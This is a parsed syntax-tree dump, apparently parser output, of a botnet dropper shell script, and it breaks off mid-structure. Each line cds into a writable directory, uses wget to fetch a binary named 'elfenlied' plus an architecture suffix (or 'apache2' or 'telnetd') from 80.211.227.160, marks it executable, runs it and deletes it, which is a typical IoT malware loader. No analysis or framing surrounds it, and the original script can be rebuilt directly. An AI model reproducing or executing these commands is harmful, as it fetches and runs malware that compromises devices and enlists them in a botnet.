ListNode(lineno=2, pos=(12, 170), parts=[
  CommandNode(lineno=2, pos=(12, 19), parts=[
    WordNode(lineno=2, pos=(12, 14), word='cd'),
    WordNode(lineno=2, pos=(15, 19), word='/tmp'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(20, 22)),
  CommandNode(lineno=2, pos=(23, 34), parts=[
    WordNode(lineno=2, pos=(23, 25), word='cd'),
    WordNode(lineno=2, pos=(26, 34), word='/var/run'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(35, 37)),
  CommandNode(lineno=2, pos=(38, 45), parts=[
    WordNode(lineno=2, pos=(38, 40), word='cd'),
    WordNode(lineno=2, pos=(41, 45), word='/mnt'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(46, 48)),
  CommandNode(lineno=2, pos=(49, 57), parts=[
    WordNode(lineno=2, pos=(49, 51), word='cd'),
    WordNode(lineno=2, pos=(52, 57), word='/root'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(58, 60)),
  CommandNode(lineno=2, pos=(61, 65), parts=[
    WordNode(lineno=2, pos=(61, 63), word='cd'),
    WordNode(lineno=2, pos=(64, 65), word='/'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(65, 66)),
  CommandNode(lineno=2, pos=(67, 107), parts=[
    WordNode(lineno=2, pos=(67, 71), word='wget'),
    WordNode(lineno=2, pos=(72, 107), word='http://80.211.227.160/elfenliedmips'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(107, 108)),
  CommandNode(lineno=2, pos=(109, 131), parts=[
    WordNode(lineno=2, pos=(109, 114), word='chmod'),
    WordNode(lineno=2, pos=(115, 117), word='+x'),
    WordNode(lineno=2, pos=(118, 131), word='elfenliedmips'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(131, 132)),
  CommandNode(lineno=2, pos=(133, 148), parts=[
    WordNode(lineno=2, pos=(133, 148), word='./elfenliedmips'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(148, 149)),
  CommandNode(lineno=2, pos=(150, 170), parts=[
    WordNode(lineno=2, pos=(150, 152), word='rm'),
    WordNode(lineno=2, pos=(153, 156), word='-rf'),
    WordNode(lineno=2, pos=(157, 170), word='elfenliedmips'),
  ]),
])
ListNode(lineno=3, pos=(171, 337), parts=[
  CommandNode(lineno=3, pos=(171, 178), parts=[
    WordNode(lineno=3, pos=(171, 173), word='cd'),
    WordNode(lineno=3, pos=(174, 178), word='/tmp'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(179, 181)),
  CommandNode(lineno=3, pos=(182, 193), parts=[
    WordNode(lineno=3, pos=(182, 184), word='cd'),
    WordNode(lineno=3, pos=(185, 193), word='/var/run'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(194, 196)),
  CommandNode(lineno=3, pos=(197, 204), parts=[
    WordNode(lineno=3, pos=(197, 199), word='cd'),
    WordNode(lineno=3, pos=(200, 204), word='/mnt'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(205, 207)),
  CommandNode(lineno=3, pos=(208, 216), parts=[
    WordNode(lineno=3, pos=(208, 210), word='cd'),
    WordNode(lineno=3, pos=(211, 216), word='/root'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(217, 219)),
  CommandNode(lineno=3, pos=(220, 224), parts=[
    WordNode(lineno=3, pos=(220, 222), word='cd'),
    WordNode(lineno=3, pos=(223, 224), word='/'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(224, 225)),
  CommandNode(lineno=3, pos=(226, 268), parts=[
    WordNode(lineno=3, pos=(226, 230), word='wget'),
    WordNode(lineno=3, pos=(231, 268), word='http://80.211.227.160/elfenliedmipsel'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(268, 269)),
  CommandNode(lineno=3, pos=(270, 294), parts=[
    WordNode(lineno=3, pos=(270, 275), word='chmod'),
    WordNode(lineno=3, pos=(276, 278), word='+x'),
    WordNode(lineno=3, pos=(279, 294), word='elfenliedmipsel'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(294, 295)),
  CommandNode(lineno=3, pos=(296, 313), parts=[
    WordNode(lineno=3, pos=(296, 313), word='./elfenliedmipsel'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(313, 314)),
  CommandNode(lineno=3, pos=(315, 337), parts=[
    WordNode(lineno=3, pos=(315, 317), word='rm'),
    WordNode(lineno=3, pos=(318, 321), word='-rf'),
    WordNode(lineno=3, pos=(322, 337), word='elfenliedmipsel'),
  ]),
])
ListNode(lineno=4, pos=(338, 492), parts=[
  CommandNode(lineno=4, pos=(338, 345), parts=[
    WordNode(lineno=4, pos=(338, 340), word='cd'),
    WordNode(lineno=4, pos=(341, 345), word='/tmp'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(346, 348)),
  CommandNode(lineno=4, pos=(349, 360), parts=[
    WordNode(lineno=4, pos=(349, 351), word='cd'),
    WordNode(lineno=4, pos=(352, 360), word='/var/run'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(361, 363)),
  CommandNode(lineno=4, pos=(364, 371), parts=[
    WordNode(lineno=4, pos=(364, 366), word='cd'),
    WordNode(lineno=4, pos=(367, 371), word='/mnt'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(372, 374)),
  CommandNode(lineno=4, pos=(375, 383), parts=[
    WordNode(lineno=4, pos=(375, 377), word='cd'),
    WordNode(lineno=4, pos=(378, 383), word='/root'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(384, 386)),
  CommandNode(lineno=4, pos=(387, 391), parts=[
    WordNode(lineno=4, pos=(387, 389), word='cd'),
    WordNode(lineno=4, pos=(390, 391), word='/'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(391, 392)),
  CommandNode(lineno=4, pos=(393, 432), parts=[
    WordNode(lineno=4, pos=(393, 397), word='wget'),
    WordNode(lineno=4, pos=(398, 432), word='http://80.211.227.160/elfenliedsh4'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(432, 433)),
  CommandNode(lineno=4, pos=(434, 455), parts=[
    WordNode(lineno=4, pos=(434, 439), word='chmod'),
    WordNode(lineno=4, pos=(440, 442), word='+x'),
    WordNode(lineno=4, pos=(443, 455), word='elfenliedsh4'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(455, 456)),
  CommandNode(lineno=4, pos=(457, 471), parts=[
    WordNode(lineno=4, pos=(457, 471), word='./elfenliedsh4'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(471, 472)),
  CommandNode(lineno=4, pos=(473, 492), parts=[
    WordNode(lineno=4, pos=(473, 475), word='rm'),
    WordNode(lineno=4, pos=(476, 479), word='-rf'),
    WordNode(lineno=4, pos=(480, 492), word='elfenliedsh4'),
  ]),
])
ListNode(lineno=5, pos=(493, 647), parts=[
  CommandNode(lineno=5, pos=(493, 500), parts=[
    WordNode(lineno=5, pos=(493, 495), word='cd'),
    WordNode(lineno=5, pos=(496, 500), word='/tmp'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(501, 503)),
  CommandNode(lineno=5, pos=(504, 515), parts=[
    WordNode(lineno=5, pos=(504, 506), word='cd'),
    WordNode(lineno=5, pos=(507, 515), word='/var/run'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(516, 518)),
  CommandNode(lineno=5, pos=(519, 526), parts=[
    WordNode(lineno=5, pos=(519, 521), word='cd'),
    WordNode(lineno=5, pos=(522, 526), word='/mnt'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(527, 529)),
  CommandNode(lineno=5, pos=(530, 538), parts=[
    WordNode(lineno=5, pos=(530, 532), word='cd'),
    WordNode(lineno=5, pos=(533, 538), word='/root'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(539, 541)),
  CommandNode(lineno=5, pos=(542, 546), parts=[
    WordNode(lineno=5, pos=(542, 544), word='cd'),
    WordNode(lineno=5, pos=(545, 546), word='/'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(546, 547)),
  CommandNode(lineno=5, pos=(548, 587), parts=[
    WordNode(lineno=5, pos=(548, 552), word='wget'),
    WordNode(lineno=5, pos=(553, 587), word='http://80.211.227.160/elfenliedx86'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(587, 588)),
  CommandNode(lineno=5, pos=(589, 610), parts=[
    WordNode(lineno=5, pos=(589, 594), word='chmod'),
    WordNode(lineno=5, pos=(595, 597), word='+x'),
    WordNode(lineno=5, pos=(598, 610), word='elfenliedx86'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(610, 611)),
  CommandNode(lineno=5, pos=(612, 626), parts=[
    WordNode(lineno=5, pos=(612, 626), word='./elfenliedx86'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(626, 627)),
  CommandNode(lineno=5, pos=(628, 647), parts=[
    WordNode(lineno=5, pos=(628, 630), word='rm'),
    WordNode(lineno=5, pos=(631, 634), word='-rf'),
    WordNode(lineno=5, pos=(635, 647), word='elfenliedx86'),
  ]),
])
ListNode(lineno=6, pos=(648, 814), parts=[
  CommandNode(lineno=6, pos=(648, 655), parts=[
    WordNode(lineno=6, pos=(648, 650), word='cd'),
    WordNode(lineno=6, pos=(651, 655), word='/tmp'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(656, 658)),
  CommandNode(lineno=6, pos=(659, 670), parts=[
    WordNode(lineno=6, pos=(659, 661), word='cd'),
    WordNode(lineno=6, pos=(662, 670), word='/var/run'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(671, 673)),
  CommandNode(lineno=6, pos=(674, 681), parts=[
    WordNode(lineno=6, pos=(674, 676), word='cd'),
    WordNode(lineno=6, pos=(677, 681), word='/mnt'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(682, 684)),
  CommandNode(lineno=6, pos=(685, 693), parts=[
    WordNode(lineno=6, pos=(685, 687), word='cd'),
    WordNode(lineno=6, pos=(688, 693), word='/root'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(694, 696)),
  CommandNode(lineno=6, pos=(697, 701), parts=[
    WordNode(lineno=6, pos=(697, 699), word='cd'),
    WordNode(lineno=6, pos=(700, 701), word='/'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(701, 702)),
  CommandNode(lineno=6, pos=(703, 745), parts=[
    WordNode(lineno=6, pos=(703, 707), word='wget'),
    WordNode(lineno=6, pos=(708, 745), word='http://80.211.227.160/elfenliedarmv6l'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(745, 746)),
  CommandNode(lineno=6, pos=(747, 771), parts=[
    WordNode(lineno=6, pos=(747, 752), word='chmod'),
    WordNode(lineno=6, pos=(753, 755), word='+x'),
    WordNode(lineno=6, pos=(756, 771), word='elfenliedarmv6l'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(771, 772)),
  CommandNode(lineno=6, pos=(773, 790), parts=[
    WordNode(lineno=6, pos=(773, 790), word='./elfenliedarmv6l'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(790, 791)),
  CommandNode(lineno=6, pos=(792, 814), parts=[
    WordNode(lineno=6, pos=(792, 794), word='rm'),
    WordNode(lineno=6, pos=(795, 798), word='-rf'),
    WordNode(lineno=6, pos=(799, 814), word='elfenliedarmv6l'),
  ]),
])
ListNode(lineno=7, pos=(815, 973), parts=[
  CommandNode(lineno=7, pos=(815, 822), parts=[
    WordNode(lineno=7, pos=(815, 817), word='cd'),
    WordNode(lineno=7, pos=(818, 822), word='/tmp'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(823, 825)),
  CommandNode(lineno=7, pos=(826, 837), parts=[
    WordNode(lineno=7, pos=(826, 828), word='cd'),
    WordNode(lineno=7, pos=(829, 837), word='/var/run'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(838, 840)),
  CommandNode(lineno=7, pos=(841, 848), parts=[
    WordNode(lineno=7, pos=(841, 843), word='cd'),
    WordNode(lineno=7, pos=(844, 848), word='/mnt'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(849, 851)),
  CommandNode(lineno=7, pos=(852, 860), parts=[
    WordNode(lineno=7, pos=(852, 854), word='cd'),
    WordNode(lineno=7, pos=(855, 860), word='/root'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(861, 863)),
  CommandNode(lineno=7, pos=(864, 868), parts=[
    WordNode(lineno=7, pos=(864, 866), word='cd'),
    WordNode(lineno=7, pos=(867, 868), word='/'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(868, 869)),
  CommandNode(lineno=7, pos=(870, 910), parts=[
    WordNode(lineno=7, pos=(870, 874), word='wget'),
    WordNode(lineno=7, pos=(875, 910), word='http://80.211.227.160/elfenliedi686'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(910, 911)),
  CommandNode(lineno=7, pos=(912, 934), parts=[
    WordNode(lineno=7, pos=(912, 917), word='chmod'),
    WordNode(lineno=7, pos=(918, 920), word='+x'),
    WordNode(lineno=7, pos=(921, 934), word='elfenliedi686'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(934, 935)),
  CommandNode(lineno=7, pos=(936, 951), parts=[
    WordNode(lineno=7, pos=(936, 951), word='./elfenliedi686'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(951, 952)),
  CommandNode(lineno=7, pos=(953, 973), parts=[
    WordNode(lineno=7, pos=(953, 955), word='rm'),
    WordNode(lineno=7, pos=(956, 959), word='-rf'),
    WordNode(lineno=7, pos=(960, 973), word='elfenliedi686'),
  ]),
])
ListNode(lineno=8, pos=(974, 1128), parts=[
  CommandNode(lineno=8, pos=(974, 981), parts=[
    WordNode(lineno=8, pos=(974, 976), word='cd'),
    WordNode(lineno=8, pos=(977, 981), word='/tmp'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(982, 984)),
  CommandNode(lineno=8, pos=(985, 996), parts=[
    WordNode(lineno=8, pos=(985, 987), word='cd'),
    WordNode(lineno=8, pos=(988, 996), word='/var/run'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(997, 999)),
  CommandNode(lineno=8, pos=(1000, 1007), parts=[
    WordNode(lineno=8, pos=(1000, 1002), word='cd'),
    WordNode(lineno=8, pos=(1003, 1007), word='/mnt'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(1008, 1010)),
  CommandNode(lineno=8, pos=(1011, 1019), parts=[
    WordNode(lineno=8, pos=(1011, 1013), word='cd'),
    WordNode(lineno=8, pos=(1014, 1019), word='/root'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(1020, 1022)),
  CommandNode(lineno=8, pos=(1023, 1027), parts=[
    WordNode(lineno=8, pos=(1023, 1025), word='cd'),
    WordNode(lineno=8, pos=(1026, 1027), word='/'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(1027, 1028)),
  CommandNode(lineno=8, pos=(1029, 1068), parts=[
    WordNode(lineno=8, pos=(1029, 1033), word='wget'),
    WordNode(lineno=8, pos=(1034, 1068), word='http://80.211.227.160/elfenliedppc'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(1068, 1069)),
  CommandNode(lineno=8, pos=(1070, 1091), parts=[
    WordNode(lineno=8, pos=(1070, 1075), word='chmod'),
    WordNode(lineno=8, pos=(1076, 1078), word='+x'),
    WordNode(lineno=8, pos=(1079, 1091), word='elfenliedppc'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(1091, 1092)),
  CommandNode(lineno=8, pos=(1093, 1107), parts=[
    WordNode(lineno=8, pos=(1093, 1107), word='./elfenliedppc'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(1107, 1108)),
  CommandNode(lineno=8, pos=(1109, 1128), parts=[
    WordNode(lineno=8, pos=(1109, 1111), word='rm'),
    WordNode(lineno=8, pos=(1112, 1115), word='-rf'),
    WordNode(lineno=8, pos=(1116, 1128), word='elfenliedppc'),
  ]),
])
ListNode(lineno=9, pos=(1129, 1287), parts=[
  CommandNode(lineno=9, pos=(1129, 1136), parts=[
    WordNode(lineno=9, pos=(1129, 1131), word='cd'),
    WordNode(lineno=9, pos=(1132, 1136), word='/tmp'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1137, 1139)),
  CommandNode(lineno=9, pos=(1140, 1151), parts=[
    WordNode(lineno=9, pos=(1140, 1142), word='cd'),
    WordNode(lineno=9, pos=(1143, 1151), word='/var/run'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1152, 1154)),
  CommandNode(lineno=9, pos=(1155, 1162), parts=[
    WordNode(lineno=9, pos=(1155, 1157), word='cd'),
    WordNode(lineno=9, pos=(1158, 1162), word='/mnt'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1163, 1165)),
  CommandNode(lineno=9, pos=(1166, 1174), parts=[
    WordNode(lineno=9, pos=(1166, 1168), word='cd'),
    WordNode(lineno=9, pos=(1169, 1174), word='/root'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1175, 1177)),
  CommandNode(lineno=9, pos=(1178, 1182), parts=[
    WordNode(lineno=9, pos=(1178, 1180), word='cd'),
    WordNode(lineno=9, pos=(1181, 1182), word='/'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1182, 1183)),
  CommandNode(lineno=9, pos=(1184, 1224), parts=[
    WordNode(lineno=9, pos=(1184, 1188), word='wget'),
    WordNode(lineno=9, pos=(1189, 1224), word='http://80.211.227.160/elfenliedi586'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1224, 1225)),
  CommandNode(lineno=9, pos=(1226, 1248), parts=[
    WordNode(lineno=9, pos=(1226, 1231), word='chmod'),
    WordNode(lineno=9, pos=(1232, 1234), word='+x'),
    WordNode(lineno=9, pos=(1235, 1248), word='elfenliedi586'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1248, 1249)),
  CommandNode(lineno=9, pos=(1250, 1265), parts=[
    WordNode(lineno=9, pos=(1250, 1265), word='./elfenliedi586'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1265, 1266)),
  CommandNode(lineno=9, pos=(1267, 1287), parts=[
    WordNode(lineno=9, pos=(1267, 1269), word='rm'),
    WordNode(lineno=9, pos=(1270, 1273), word='-rf'),
    WordNode(lineno=9, pos=(1274, 1287), word='elfenliedi586'),
  ]),
])
ListNode(lineno=10, pos=(1288, 1446), parts=[
  CommandNode(lineno=10, pos=(1288, 1295), parts=[
    WordNode(lineno=10, pos=(1288, 1290), word='cd'),
    WordNode(lineno=10, pos=(1291, 1295), word='/tmp'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1296, 1298)),
  CommandNode(lineno=10, pos=(1299, 1310), parts=[
    WordNode(lineno=10, pos=(1299, 1301), word='cd'),
    WordNode(lineno=10, pos=(1302, 1310), word='/var/run'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1311, 1313)),
  CommandNode(lineno=10, pos=(1314, 1321), parts=[
    WordNode(lineno=10, pos=(1314, 1316), word='cd'),
    WordNode(lineno=10, pos=(1317, 1321), word='/mnt'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1322, 1324)),
  CommandNode(lineno=10, pos=(1325, 1333), parts=[
    WordNode(lineno=10, pos=(1325, 1327), word='cd'),
    WordNode(lineno=10, pos=(1328, 1333), word='/root'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1334, 1336)),
  CommandNode(lineno=10, pos=(1337, 1341), parts=[
    WordNode(lineno=10, pos=(1337, 1339), word='cd'),
    WordNode(lineno=10, pos=(1340, 1341), word='/'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1341, 1342)),
  CommandNode(lineno=10, pos=(1343, 1383), parts=[
    WordNode(lineno=10, pos=(1343, 1347), word='wget'),
    WordNode(lineno=10, pos=(1348, 1383), word='http://80.211.227.160/elfenliedm68k'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1383, 1384)),
  CommandNode(lineno=10, pos=(1385, 1407), parts=[
    WordNode(lineno=10, pos=(1385, 1390), word='chmod'),
    WordNode(lineno=10, pos=(1391, 1393), word='+x'),
    WordNode(lineno=10, pos=(1394, 1407), word='elfenliedm68k'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1407, 1408)),
  CommandNode(lineno=10, pos=(1409, 1424), parts=[
    WordNode(lineno=10, pos=(1409, 1424), word='./elfenliedm68k'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1424, 1425)),
  CommandNode(lineno=10, pos=(1426, 1446), parts=[
    WordNode(lineno=10, pos=(1426, 1428), word='rm'),
    WordNode(lineno=10, pos=(1429, 1432), word='-rf'),
    WordNode(lineno=10, pos=(1433, 1446), word='elfenliedm68k'),
  ]),
])
ListNode(lineno=11, pos=(1447, 1609), parts=[
  CommandNode(lineno=11, pos=(1447, 1454), parts=[
    WordNode(lineno=11, pos=(1447, 1449), word='cd'),
    WordNode(lineno=11, pos=(1450, 1454), word='/tmp'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1455, 1457)),
  CommandNode(lineno=11, pos=(1458, 1469), parts=[
    WordNode(lineno=11, pos=(1458, 1460), word='cd'),
    WordNode(lineno=11, pos=(1461, 1469), word='/var/run'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1470, 1472)),
  CommandNode(lineno=11, pos=(1473, 1480), parts=[
    WordNode(lineno=11, pos=(1473, 1475), word='cd'),
    WordNode(lineno=11, pos=(1476, 1480), word='/mnt'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1481, 1483)),
  CommandNode(lineno=11, pos=(1484, 1492), parts=[
    WordNode(lineno=11, pos=(1484, 1486), word='cd'),
    WordNode(lineno=11, pos=(1487, 1492), word='/root'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1493, 1495)),
  CommandNode(lineno=11, pos=(1496, 1500), parts=[
    WordNode(lineno=11, pos=(1496, 1498), word='cd'),
    WordNode(lineno=11, pos=(1499, 1500), word='/'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1500, 1501)),
  CommandNode(lineno=11, pos=(1502, 1543), parts=[
    WordNode(lineno=11, pos=(1502, 1506), word='wget'),
    WordNode(lineno=11, pos=(1507, 1543), word='http://80.211.227.160/elfenliedsparc'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1543, 1544)),
  CommandNode(lineno=11, pos=(1545, 1568), parts=[
    WordNode(lineno=11, pos=(1545, 1550), word='chmod'),
    WordNode(lineno=11, pos=(1551, 1553), word='+x'),
    WordNode(lineno=11, pos=(1554, 1568), word='elfenliedsparc'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1568, 1569)),
  CommandNode(lineno=11, pos=(1570, 1586), parts=[
    WordNode(lineno=11, pos=(1570, 1586), word='./elfenliedsparc'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1586, 1587)),
  CommandNode(lineno=11, pos=(1588, 1609), parts=[
    WordNode(lineno=11, pos=(1588, 1590), word='rm'),
    WordNode(lineno=11, pos=(1591, 1594), word='-rf'),
    WordNode(lineno=11, pos=(1595, 1609), word='elfenliedsparc'),
  ]),
])
ListNode(lineno=12, pos=(1610, 1728), parts=[
  CommandNode(lineno=12, pos=(1610, 1617), parts=[
    WordNode(lineno=12, pos=(1610, 1612), word='cd'),
    WordNode(lineno=12, pos=(1613, 1617), word='/tmp'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1618, 1620)),
  CommandNode(lineno=12, pos=(1621, 1632), parts=[
    WordNode(lineno=12, pos=(1621, 1623), word='cd'),
    WordNode(lineno=12, pos=(1624, 1632), word='/var/run'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1633, 1635)),
  CommandNode(lineno=12, pos=(1636, 1643), parts=[
    WordNode(lineno=12, pos=(1636, 1638), word='cd'),
    WordNode(lineno=12, pos=(1639, 1643), word='/mnt'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1644, 1646)),
  CommandNode(lineno=12, pos=(1647, 1655), parts=[
    WordNode(lineno=12, pos=(1647, 1649), word='cd'),
    WordNode(lineno=12, pos=(1650, 1655), word='/root'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1656, 1658)),
  CommandNode(lineno=12, pos=(1659, 1663), parts=[
    WordNode(lineno=12, pos=(1659, 1661), word='cd'),
    WordNode(lineno=12, pos=(1662, 1663), word='/'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1663, 1664)),
  CommandNode(lineno=12, pos=(1665, 1695), parts=[
    WordNode(lineno=12, pos=(1665, 1669), word='wget'),
    WordNode(lineno=12, pos=(1670, 1695), word='http://80.211.227.160/ '),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1695, 1696)),
  CommandNode(lineno=12, pos=(1697, 1709), parts=[
    WordNode(lineno=12, pos=(1697, 1702), word='chmod'),
    WordNode(lineno=12, pos=(1703, 1705), word='+x'),
    WordNode(lineno=12, pos=(1706, 1709), word=' '),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1709, 1710)),
  CommandNode(lineno=12, pos=(1711, 1716), parts=[
    WordNode(lineno=12, pos=(1711, 1716), word='./ '),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1716, 1717)),
  CommandNode(lineno=12, pos=(1718, 1728), parts=[
    WordNode(lineno=12, pos=(1718, 1720), word='rm'),
    WordNode(lineno=12, pos=(1721, 1724), word='-rf'),
    WordNode(lineno=12, pos=(1725, 1728), word=' '),
  ]),
])
ListNode(lineno=13, pos=(1729, 1863), parts=[
  CommandNode(lineno=13, pos=(1729, 1736), parts=[
    WordNode(lineno=13, pos=(1729, 1731), word='cd'),
    WordNode(lineno=13, pos=(1732, 1736), word='/tmp'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1737, 1739)),
  CommandNode(lineno=13, pos=(1740, 1751), parts=[
    WordNode(lineno=13, pos=(1740, 1742), word='cd'),
    WordNode(lineno=13, pos=(1743, 1751), word='/var/run'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1752, 1754)),
  CommandNode(lineno=13, pos=(1755, 1762), parts=[
    WordNode(lineno=13, pos=(1755, 1757), word='cd'),
    WordNode(lineno=13, pos=(1758, 1762), word='/mnt'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1763, 1765)),
  CommandNode(lineno=13, pos=(1766, 1774), parts=[
    WordNode(lineno=13, pos=(1766, 1768), word='cd'),
    WordNode(lineno=13, pos=(1769, 1774), word='/root'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1775, 1777)),
  CommandNode(lineno=13, pos=(1778, 1782), parts=[
    WordNode(lineno=13, pos=(1778, 1780), word='cd'),
    WordNode(lineno=13, pos=(1781, 1782), word='/'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1782, 1783)),
  CommandNode(lineno=13, pos=(1784, 1818), parts=[
    WordNode(lineno=13, pos=(1784, 1788), word='wget'),
    WordNode(lineno=13, pos=(1789, 1818), word='http://80.211.227.160/apache2'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1818, 1819)),
  CommandNode(lineno=13, pos=(1820, 1836), parts=[
    WordNode(lineno=13, pos=(1820, 1825), word='chmod'),
    WordNode(lineno=13, pos=(1826, 1828), word='+x'),
    WordNode(lineno=13, pos=(1829, 1836), word='apache2'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1836, 1837)),
  CommandNode(lineno=13, pos=(1838, 1847), parts=[
    WordNode(lineno=13, pos=(1838, 1847), word='./apache2'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1847, 1848)),
  CommandNode(lineno=13, pos=(1849, 1863), parts=[
    WordNode(lineno=13, pos=(1849, 1851), word='rm'),
    WordNode(lineno=13, pos=(1852, 1855), word='-rf'),
    WordNode(lineno=13, pos=(1856, 1863), word='apache2'),
  ]),
])
ListNode(lineno=14, pos=(1864, 1998), parts=[
  CommandNode(lineno=14, pos=(1864, 1871), parts=[
    WordNode(lineno=14, pos=(1864, 1866), word='cd'),
    WordNode(lineno=14, pos=(1867, 1871), word='/tmp'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1872, 1874)),
  CommandNode(lineno=14, pos=(1875, 1886), parts=[
    WordNode(lineno=14, pos=(1875, 1877), word='cd'),
    WordNode(lineno=14, pos=(1878, 1886), word='/var/run'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1887, 1889)),
  CommandNode(lineno=14, pos=(1890, 1897), parts=[
    WordNode(lineno=14, pos=(1890, 1892), word='cd'),
    WordNode(lineno=14, pos=(1893, 1897), word='/mnt'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1898, 1900)),
  CommandNode(lineno=14, pos=(1901, 1909), parts=[
    WordNode(lineno=14, pos=(1901, 1903), word='cd'),
    WordNode(lineno=14, pos=(1904, 1909), word='/root'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1910, 1912)),
  CommandNode(lineno=14, pos=(1913, 1917), parts=[
    WordNode(lineno=14, pos=(1913, 1915), word='cd'),
    WordNode(lineno=14, pos=(1916, 1917), word='/'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1917, 1918)),
  CommandNode(lineno=14, pos=(1919, 1953), parts=[
    WordNode(lineno=14, pos=(1919, 1923), word='wget'),
    WordNode(lineno=14, pos=(1924, 1953), word='http://80.211.227.160/telnetd'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1953, 1954)),
  CommandNode(lineno=14, pos=(1955, 1971), parts=[
    WordNode(lineno=14, pos=(1955, 1960), word='chmod'),
    WordNode(lineno=14, pos=(1961, 1963), word='+x'),
    WordNode(lineno=14, pos=(1964, 1971), word='telnetd'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1971, 1972)),
  CommandNode(lineno=14, pos=(1973, 1982), parts=[
    WordNode(lineno=14, pos=(1973, 1982), word='./telnetd'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1982, 1983)),
  CommandNode(lineno=14, pos=(1984, 1998), parts=[
    WordNode(lineno=14, pos=(1984, 1986), word='rm'),
    WordNode(lineno=14, pos=(1987, 1990), word='-rf'),
    WordNode(lineno=14, pos=(1991, 1998), word='telnetd'),
  ]),
